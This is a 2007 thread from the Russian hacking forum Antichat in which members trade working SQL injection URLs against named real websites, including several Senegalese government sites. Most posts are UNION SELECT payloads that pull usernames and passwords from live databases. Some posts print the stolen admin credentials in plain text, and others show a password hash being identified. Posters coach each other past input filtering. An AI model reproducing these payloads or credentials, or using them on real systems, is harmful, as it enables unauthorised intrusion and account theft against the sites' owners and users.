ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

sql
  #2871  
Старый 17.08.2007, 14:34
Аватар для Серенький
Серенький
Banned
Регистрация: 13.04.2007
Сообщений: 123
Провел на форуме:
921520

Репутация: 572
Arrow sql

Red_Red1 Calcutta

Цитата:
По моему тут надо таким способом, а иначе фильтрация работает...
http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(versi on(),0x71),0x71),5,6,7,8,9,10,11,12/*
З.Ы. Но дальше тоже не пошло
-->
Цитата:
http://wow.crpg.ru/article.php?sid=11+union+select+1,2,3,4,5,concat_w s(0x3a,uname,pass),7,8,9,0,1,2+From+users/*
вывода нет
но вывод есть здесь:
Цитата:
http://www.rolemancer.ru/sections.php?op=listarticles&secid=-69+union+select+1,2,concat(uname,0x3a,pass),4+from +users/*
ибо crpg.ru и rolemancer.ru на одном сервере

/ps/ антибоян http://antiboyansql.narod.ru/sql.txt

------------------------------------------------------------------------

DRoT1K
Цитата:
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
->
Цитата:
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,username ,password),8+from+user+limit+3500,1/*
-----------------
Цитата:
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/*
->
Цитата:
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,concat_ws(0x3a,table_schema,tab le_name,column_name),4,5+from+information_schema.c olumns+where+table_name=0x61757468+limit+1,1/*
авторизация
Цитата:
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,concat_ws(0x3a,user,pass),4,5+f rom+auth+limit+0,1/*

Последний раз редактировалось Серенький; 17.08.2007 в 14:50..
 
Ответить с цитированием

  #2872  
Старый 17.08.2007, 21:22
Аватар для halkfild
halkfild
Leaders of Antichat - Level 4
Регистрация: 11.11.2005
Сообщений: 391
Провел на форуме:
7084941

Репутация: 2277
По умолчанию

Цитата:
http://www.walf.sn/economique/suite.php?rub=-3+union+select+1,concat_ws(0x3a,version(), database(), user()),3,4,5/*&id_art=1
5.0.22-standard-log:new_walbase:walf_admin@localhost

Цитата:
http://www.walf.sn/economique/suite.php?rub=-3+union+select+1,concat_ws(0x3a,login,pass),3,4,5+ from+users/*&id_art=1
walf_admin:#walf!base

Последний раз редактировалось halkfild; 17.08.2007 в 21:24..
 
Ответить с цитированием

  #2873  
Старый 17.08.2007, 23:20
Аватар для t00th
t00th
Banned
Регистрация: 15.07.2007
Сообщений: 39
Провел на форуме:
1122110

Репутация: 43
По умолчанию

Код:
http://www.iltod.gov.mn/forum.php?cat=-1+union+select+1,2,USER(),4,5/*
Код:
http://www.sante.gouv.sn/actualites.php?id=1+union+select+1,2,3,4/*
Код:
http://www.muat.gouv.sn/projets.php?id=1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,19/*
Код:
http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,USER(),4,5,6/*
 
Ответить с цитированием

  #2874  
Старый 18.08.2007, 04:22
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,3,4,5,6,7,8,9%20from%20 user/*
Лови. Пароль (точнее хеш) показывает, а вот колонку логина не подобрал. И откуда эти пароли хз!
 
Ответить с цитированием

  #2875  
Старый 18.08.2007, 14:21
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от Red_Red1  
http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,3,4,5,6,7,8,9%20from%20 user/*
Лови. Пароль (точнее хеш) показывает, а вот колонку логина не подобрал. И откуда эти пароли хз!
по формату похоже на MySQL5 хэш

зы так оно и есь
*4ACFE3202A5FF5CF467898FC58AAB1D615029441:admin
 
Ответить с цитированием

  #2876  
Старый 18.08.2007, 15:14
Аватар для t00th
t00th
Banned
Регистрация: 15.07.2007
Сообщений: 39
Провел на форуме:
1122110

Репутация: 43
По умолчанию

Код:
http://www.denv.gouv.sn/activites/details.php?id=1'+union+select+1,2,login,password,5,6+from+admin/*
admin: passe
 
Ответить с цитированием

  #2877  
Старый 18.08.2007, 20:30
Аватар для Nazaret2005
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
Wink

Цитата:
Сообщение от geezer.code  
по формату похоже на MySQL5 хэш

зы так оно и есь
*4ACFE3202A5FF5CF467898FC58AAB1D615029441:admin
Там все поля admin

Цитата:
http://www.utcongress.nl/user/php/congress.php?id=-10+union+select+1,password,lastname,4,5,6,firstnam e,userid,9%20from%20%20user/*
Я вычислил имя и фамилию (админ) + id (1)

Последний раз редактировалось Nazaret2005; 18.08.2007 в 21:45..
 
Ответить с цитированием

  #2878  
Старый 18.08.2007, 22:28
Аватар для Termin@L
Termin@L
Участник форума
Регистрация: 07.12.2006
Сообщений: 192
Провел на форуме:
492591

Репутация: 123
По умолчанию

http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat([$%$#$],char(58),pass),0x17),0x17)+from+user/*
Я очень долго .... себе этим мозг, но первое поле подобрать не смог...
Может у кого получится?
З.Ы, вот ещё http://perspektiva.ural.ru/index.php?cat=52&pcat=-1+union+select+AES_DECRYPT(AES_ENCRYPT(pass,0x17), 0x17)+from+adm/*

Последний раз редактировалось Termin@L; 18.08.2007 в 23:03..
 
Ответить с цитированием

  #2879  
Старый 19.08.2007, 00:48
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

Цитата:
Сообщение от fobofob  
Тут я ничего не могу понять
кто знает разъясните плз

код:

http://www.mtas.ru/second.php?ID=-15+union+select+1/*
тут многоуровневй запрос

Код:
http://www.mtas.ru/second.php?ID=-15+union+select+razdeli_name+from+razdeli/*
вот так работает,)) смотрим текст ошибки ) надо терь подобрать таблицу юзеров ))

Последний раз редактировалось geezer.code; 19.08.2007 в 00:53..
 
Ответить с цитированием

  #2880  
Старый 19.08.2007, 00:50
Аватар для [53x]Shadow
[53x]Shadow
Leaders of Antichat
Регистрация: 25.01.2007
Сообщений: 341
Провел на форуме:
3372120

Репутация: 2565
По умолчанию

Цитата:
Сообщение от fobofob  
Тут я ничего не могу понять
кто знает разъясните плз

код:

http://www.mtas.ru/second.php?ID=-15+union+select+1/*
Для начала смотри АнтиБоян
=\
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ